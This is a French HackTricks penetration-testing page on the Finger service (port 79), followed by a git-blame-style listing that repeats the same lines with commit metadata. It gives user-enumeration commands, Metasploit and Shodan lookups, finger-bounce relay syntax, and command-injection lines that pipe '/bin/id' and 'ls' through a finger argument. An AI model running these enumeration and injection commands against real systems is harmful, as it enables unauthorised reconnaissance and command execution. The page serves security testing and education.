hacktricks/network-services-pentesting/pentesting-finger.md

# 79 - Pentesting Finger

<details>

<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>

Autres façons de soutenir HackTricks:

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

## **Informations de base**

Le programme/service **Finger** est utilisé pour récupérer des détails sur les utilisateurs d'ordinateurs. En général, les informations fournies incluent le **nom d'utilisateur, le nom complet** de l'utilisateur et, dans certains cas, des détails supplémentaires. Ces détails supplémentaires pourraient inclure l'emplacement du bureau et le numéro de téléphone (si disponible), l'heure à laquelle l'utilisateur s'est connecté, la période d'inactivité (temps d'inactivité), la dernière fois que l'utilisateur a lu ses e-mails, et le contenu des fichiers de plan et de projet de l'utilisateur.

**Port par défaut :** 79
```
PORT   STATE SERVICE
79/tcp open  finger
```
## **Énumération**

### **Récupération de bannière/Connexion de base**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Énumération des utilisateurs**
```bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user
```
Alternatively you can use **finger-user-enum** from [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), some examples:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap exécute un script pour utiliser les scripts par défaut**

### Metasploit utilise plus de techniques que Nmap
```
use auxiliary/scanner/finger/finger_users
```
### Shodan

* `port:79 USER`

## Exécution de commandes
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Rebond de doigt

[Utilisez un système comme relais de doigt](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
<details>

<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>

D'autres façons de soutenir HackTricks :

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated ['network-services-pentesting/1521-1522-1529-pentesting-oracl 2024-01-05 23:28:43 +00:00			`# 79 - Pentesting Finger`

			`<details>`

Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>`
Translated ['network-services-pentesting/1521-1522-1529-pentesting-oracl 2024-01-05 23:28:43 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`Autres façons de soutenir HackTricks:`
Translated ['network-services-pentesting/1521-1522-1529-pentesting-oracl 2024-01-05 23:28:43 +00:00
			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop)!`
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez moi sur Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Partagez vos astuces de piratage en soumettant des PR aux [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Translated ['network-services-pentesting/1521-1522-1529-pentesting-oracl 2024-01-05 23:28:43 +00:00
			`</details>`

Translated to French 2023-06-03 13:10:46 +00:00			`## Informations de base`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			Le programme/service Finger est utilisé pour récupérer des détails sur les utilisateurs d'ordinateurs. En général, les informations fournies incluent le nom d'utilisateur, le nom complet de l'utilisateur et, dans certains cas, des détails supplémentaires. Ces détails supplémentaires pourraient inclure l'emplacement du bureau et le numéro de téléphone (si disponible), l'heure à laquelle l'utilisateur s'est connecté, la période d'inactivité (temps d'inactivité), la dernière fois que l'utilisateur a lu ses e-mails, et le contenu des fichiers de plan et de projet de l'utilisateur.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['network-services-pentesting/1521-1522-1529-pentesting-oracl 2024-01-05 23:28:43 +00:00			`Port par défaut : 79`
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`PORT STATE SERVICE`
			`79/tcp open finger`
			```
Translated to French 2023-06-03 13:10:46 +00:00			`## Énumération`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`### Récupération de bannière/Connexion de base`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`nc -vn <IP> 79`
			`echo "root" \| nc -vn <IP> 79`
			```
Translated ['network-services-pentesting/1521-1522-1529-pentesting-oracl 2024-01-05 23:28:43 +00:00			`### Énumération des utilisateurs`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`finger @<Victim> #List users`
			`finger admin@<Victim> #Get info of user`
			`finger user@<Victim> #Get info of user`
			```
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`Alternatively you can use finger-user-enum from [pentestmonkey](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), some examples:`
Adding the Finger Username Enumeration Tool. 2020-11-17 13:01:39 +00:00			```bash
			`finger-user-enum.pl -U users.txt -t 10.0.0.1`
			`finger-user-enum.pl -u root -t 10.0.0.1`
			`finger-user-enum.pl -U users.txt -T ips.txt`
			```
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`#### Nmap exécute un script pour utiliser les scripts par défaut`
Adding the Finger Username Enumeration Tool. 2020-11-17 13:01:39 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`### Metasploit utilise plus de techniques que Nmap`
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`use auxiliary/scanner/finger/finger_users`
			```
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`### Shodan`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			* `port:79 USER`

Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`## Exécution de commandes`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`finger "\|/bin/id@example.com"`
			`finger "\|/bin/ls -a /@example.com"`
			```
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`## Rebond de doigt`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`[Utilisez un système comme relais de doigt](https://securiteam.com/exploits/2BUQ2RFQ0I/)`
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`finger user@host@victim`
			`finger @internal@external`
			```
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`D'autres façons de soutenir HackTricks :`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:38:25 +00:00			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Découvrez [La Famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez moi sur Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Partagez vos astuces de piratage en soumettant des PR aux [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`